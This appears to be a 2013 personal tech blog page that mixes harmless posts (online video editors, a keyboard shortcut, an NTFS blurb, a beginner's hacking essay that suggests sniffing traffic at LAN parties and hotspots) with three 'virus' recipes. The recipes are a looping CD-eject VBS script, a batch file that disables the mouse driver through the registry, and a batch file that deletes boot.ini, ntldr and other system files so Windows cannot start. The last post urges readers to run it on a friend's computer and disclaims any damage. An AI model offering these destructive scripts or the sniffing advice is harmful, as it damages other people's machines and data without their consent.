Wednesday, 20 February 2013

// // Leave a Comment

Online video Editing


TOP 5 WEBSITES FOR EDIT ONLINE VIDEO

There are thousands of free
and paid software available
in the market for the
purpose of editing videos,
but the simple truth is that
most of these software are
technical and are not
friendly.
1. Online Video
Converter
www*video*online-
convert*com/



(remove * and put their .)
This is an awesome website
where you can upload your
video from your computer or
input the video URL and then
convert it to many video
formats such as 3GP, FLV,
MP4 and so many video
formats. You can also use
this website to change video
size, quality, frame rate,
audio quality and cut video.
You can also insert your
email address to receive the
download link after the
conversion process.
2. Video Toolbox
www*videotoolbox*com

(remove * and put their .)
This is an online video
editing tool that can be use
to edit videos, add
watermark, add audio stream
or subtitles, cut or merge
videos, covert videos to any
other video formats and so
many other features.
Video Toolbox can be use to
download videos from
YouTube, MetaCafe,
DailyMotion and many other
video sharing websites. You
can also use it to record
videos via your webcam.
3. Animoto
www*animoto*com
(remove * and put their .)You can use this online
video editing website to edit
videos up to 30 seconds. It
is also a great tool to turn
photos into movie.
You can upload videos from
your computer or select
videos from Animoto. You can
remix, cut, or join videos
with animator; it also
provides option to add music
to videos.
You can also import your
photos from Flickr,
Facebook, SmugMug, Picasa
and Photobucket to create a
movie.
4. JayCut
www*jaycut*com

(remove * and put their .)
With JayCut, you can record
videos with your webcam, or
upload from your computer
for editing. This online video
editing website can be use to
join, cut or remix videos and
also add audio to videos.
5. Cellsea
www*cellsea*com/
media*vindex*htm

(remove * and put their .)
This video editing website
allows you to upload video
up to 25MB in any video
supporting formats from your
computer or from a URL.
You can use Cellsea to
convert videos, join videos,
and add audio to videos. You
can also send your video to
your mobile phone when you
finish editing the video.
*ENJOY*
Read More

Thursday, 24 January 2013

// // Leave a Comment

PC tip

. [SHIFT] + [alt] + [PrntScrn] – high contrast
A window will open, click OK or simply hit [Enter]. This will enlarge the font on all open Windows and change colors to high contrast. For example the desktop will turn black, what was black text on white background will be reversed. Clicking the same key combination again reverts the changes.
Read More
// // Leave a Comment

how to start hacking

NOTE: "PLEASE LERN "

Alot of people ask “How do i
learn hacking?”, “Where do i
start?”, “How do i become a
hacker”… and so on. I
answered the question a
million times. Now we all can just give them this link to my
blog. ^^ .This is my opinion
about everything. Others
might think about it in a
different way. Eat it or just
throw it away. 


What is hacking? 

Hacking is a hobby. There are
many ways of hacking. Some
break security systems, some
reverse code.


 In my opinion
everything has to do with
hacking. If you want to become a “hacker”. You have
to get some knowledge in
computer science and love to
play around with it. That’s
basicly everything a hacker
needs ;) . What do i have to learn? This really depends on what
you want to achieve. For
example “I want to learn to
break into systems with tools
out there and i don’t want to
know a programming language”




. For me you are no
hacker then but then you just
need to learn metasploit and
co. ;)
There are some main topics in
my opinion that are important. ♣Using a computer (Linux,
configuration and so on)
♣Networking (Protocols and
how does everything work)
♣Software (Developing and
Reversing) ♣Hardware (How does your
CPU work and so on. Not my
best topic but i got some
knowledge here) Using a computer Most people, who read my
blog, have this knowledge. If
you don’t i give you the
advise to install Linux and play
around with it. Configure
some Apache servers or something like that. Just play
around till you feel
comfortable with it. Compile
some programs and so on. If
you are able to compile your
Linux kernel and use it (maybe with an optimized
configuration for your pc). This
topic should be done for you.
You don’t need to know how
to compile a kernel. Just
feeling comfortable with Linux should proof you know
how to use your computer ;) . The other topics can be learned
parallel. There is no need to
focus on one topic. Networking In my opinion everyone needs
to know how to setup a
network. Learn how to
calculate the subnet mask and
co. This should be easy just
read something about it. Google helps alot here ;) .
Learn how everything works.
Examples are ARP Protocol,
TCP/IP Protocol and how
WLAN works. With this
knowledge you can have alot of fun. You should be able to
MitM attack a router and pc
with this. With this setup
sniffing should be possible. This
is enough knowledge here in
my opinion but depending on your needs you can lern more.
Google topics or interesting
tools ♣pcap (for devs, if you want
or know software
development, this is
interesting for you)
♣arpspoof (dsniff package)
♣fragrouter (-B1 was it if i remember right to do
forwarding so the network
doesn’t break if you hook in
there)
♣dsniff tools etc. All tools you need here are on
the net and knowing a
network can be quite funny
on a LAN Party. Guys never
really never ever login private
pages on a lan party or something like this. Public
networks are public for a
network hacker ;) . Software This is my favorite. I work as
software engineer and i love
this topic. For Reversing this
blog has a tutorial series,
which starts here. Before
learning reversing you have to learn software development. I
recommend every so called
“hacker” to have at least a
basic C knowledge. People
always ask what language do i
have to learn. The question is obsolete. If you know C,
which is a functional language,
very well and want to learn
functional programming in VB.
The only thing that differs is
the syntax. I read very often there are so many differences
and just a hand of people
know assembler. This is just
plain bullshit. I know more
than a hand of people that
reverse code (which will be assembler). ;) Other rumor i
hear often from wannabe
hackers. Are that you use
absolute addresses while
developing assembler and the
compiler creates relative addresses. That’s why nearly
no one knows assembler. That
means knowing assembler
needs basic addition and
subtraction. Yeah a assembler
developer can’t do that -.-. I recommend to learn this
languages in this order: ♣C (functional programming)
♣C++ (Object oriented
programming)
♣Assembler (Low level
programming) Assembler
The masterpiece , i know no-
one who really develops
software with it. Except he is
forced to. Knowing this
language gives you the following advantages: ♣Basic knowledge for
reversing
♣Code optimizing
♣Everyone, who knows
assembler. Can imagine what
the CPU does. Hardware: You should know how a cpu
works and how to read/write
a circuit by a binary table or
formula. This is the basic,
which i know. If you want to
go deeper in this topic. Microcontroller and/or FPGAs
should be your topic. Learning
this topic can be expensive. I
recommend you to learn the
Software part next or better
before this topic. Going deep into hardware engineering
needs software. Conclusions: There is no way to give you a
numbered list what todo/learn
to be a hacker. Hacker just
means that you know
computer science and want to
do experiments with this knowledge. If i had to start
from the beginning i would do
it this way. ♣Install Linux and play around
with it
♣Setup my network in linux
so i got internet :D
♣Learn C/C++ with a book and
all it’s examples ♣Go to a lan party or hotspot
and play around with the
networking tools (don’t do
bad things, if you sniff a
password be happy, you made
it. Don’t use it for bad things! You want to be a hacker not a
cracker)
♣Play around with some
hardware and develope
software Now some years should be
gone and you should have the
knowledge to go alone from
here on. I hope this helps some people
to make the right decisions.
How to start.................
Read More
// // Leave a Comment

NTFS

About The NTFS

NTFS is an New Technology file system which is the best for Performance in your PC's Hard Drive as its Have Various Features Such as

* Its easily allocated the Space
* The virtual memory Runs smoothly
* uninterruted Facility for Data Storing
* The executing task is very quick and output response is very fast
* Compatiable with 64Bits and 32bits Artitecture environment
* Encyption and Decyption is Fast and Smooth
* Better Compressing Speed
* Sharply Readable to the Data address
* Recoverable almostly

So Always use the NTFS Hard Drive
Read More
// // Leave a Comment

Harmful Virus

CREATE A HARMLESS VIRUS WITH NOTEPAD-
CONTINUOUSLY EJECT CD/DVD
DRIVES.

Copy this code and paste it in
Notepad as Virus.vbs or *.vbs.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000 loop

Double click to open this file
Read More
// // Leave a Comment

Disable Mouse :P

Make a virus that disable Mouse...

Today we will be making a batch virus which is harmfull
It will disable your mouse so think before trying it on yourself...

1. Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Save this file as virus.bat
3. Done you just created your virus...
Read More
// // Leave a Comment

Shutdown Pc

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save it as a shutdown.bat

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.trY iT on ur frNds compuTer.
I'm nt reSponsIBLe fr ANY daMAgE
Read More